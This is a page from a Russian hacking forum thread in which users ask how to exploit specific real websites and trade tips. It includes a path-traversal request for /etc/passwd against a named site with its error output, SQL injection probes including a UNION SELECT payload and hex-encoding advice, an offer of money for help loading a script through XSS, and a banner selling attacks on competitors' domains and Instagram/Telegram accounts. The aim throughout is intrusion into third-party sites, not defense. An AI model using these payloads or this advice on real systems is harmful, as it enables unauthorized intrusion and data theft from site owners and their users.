Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2192 из 2438

2192

Опции темы

Поиск в этой теме

Опции просмотра

#21911

24.12.2012, 19:38

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

http://www.ctege.info/index.php?option=1 как раскрутить?

#21912

24.12.2012, 21:34

herfleisch

Участник форума

Регистрация: 07.01.2009

Сообщений: 237

С нами: 9126697

Репутация: 97

Цитата:

Сообщение от Vip77

http://www.ctege.info/index.php?option=1 как раскрутить?

Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:

http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd

Цитата:

Сообщение от None

FILE NOT FOUND: etcpasswd/7.html
URI:/etcpasswd/7.html
Fatal error: Using $this when not in object context in /var/www/user/data/www/ctege.org/includes/database/dbcache.php on line 206

#21913

24.12.2012, 21:57

foxxx1234

Познающий

Регистрация: 26.11.2008

Сообщений: 40

С нами: 9188165

Репутация: 4

Цитата:

Сообщение от OxoTnik

Гугли обход фильтраций XSS

Зачем мне это гуглить, xss есть, мне просто нужно чтобы скрипт свой можно было подгрузить. В общем кто знает как это сделать стукните в личку даю 500р

#21914

25.12.2012, 01:29

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

Цитата:

Сообщение от herfleisch

Как минимум есть раскрытие путей. Несколько раз повводил отбалдовые запросы и получил вот это:
http://www.ctege.info/index.php?option=../../../../.../.../etc/passwd

sqli там тоже есть

#21915

25.12.2012, 04:57

qwwertty

Новичок

Регистрация: 26.12.2009

Сообщений: 3

С нами: 8618274

Репутация: 0

Как раскрутить это?

Код:

_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27

#21916

25.12.2012, 08:18

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 12

С нами: 9176038

Репутация: 8

Цитата:

Сообщение от qwwertty

Как раскрутить это?

Код:

_ttp://www.howtotrade.ru/phorum/topusers.php?11,num=50%27

Код:

select user_id, username, posts from phorum_users where posts > 0 order by posts DESC LIMIT 0,[INJECT]

Инъекция в LIMIT при использовании конструкции ORDER BY.

Вывод - никак не раскрутишь.

#21917

25.12.2012, 11:23

FunOfGun

Постоянный

Регистрация: 05.09.2012

Сообщений: 388

С нами: 7202486

Репутация: 124

Как в таком запросе: http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20-- вместо version() вывести произвольную строку? Заранее благодарен.

#21918

25.12.2012, 13:07

qaz

Познавший АНТИЧАТ

Регистрация: 12.07.2010

Сообщений: 1,546

С нами: 8334326

Репутация: 75

Цитата:

Сообщение от FunOfGun

Как в таком запросе:
http://www.miamacdonald.com/a.php?id=-42%20union%20select%201,version(),3,4,5,6%20--
вместо version() вывести произвольную строку? Заранее благодарен.

шифруешь строку в хекс и вставляешь

#21919

25.12.2012, 14:03

herfleisch

Участник форума

Регистрация: 07.01.2009

Сообщений: 237

С нами: 9126697

Репутация: 97

Цитата:

Сообщение от Vip77

sqli там тоже есть

SQLi там есть, но раскрутить ее у меня не получилось, ибо строка запроса тупо попадает в условие запроса. Кто-то более опытный, может быть, сможет что-то выжать.

#21920

26.12.2012, 16:59

Vip77

Участник форума

Регистрация: 29.09.2012

Сообщений: 233

С нами: 7167926

Репутация: 20

Люди, помогите плиз найти раскрытие путей сайта http://www.sport.ru/

Страница 2192 из 2438

2192

Предыдущая тема Следующая тема

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход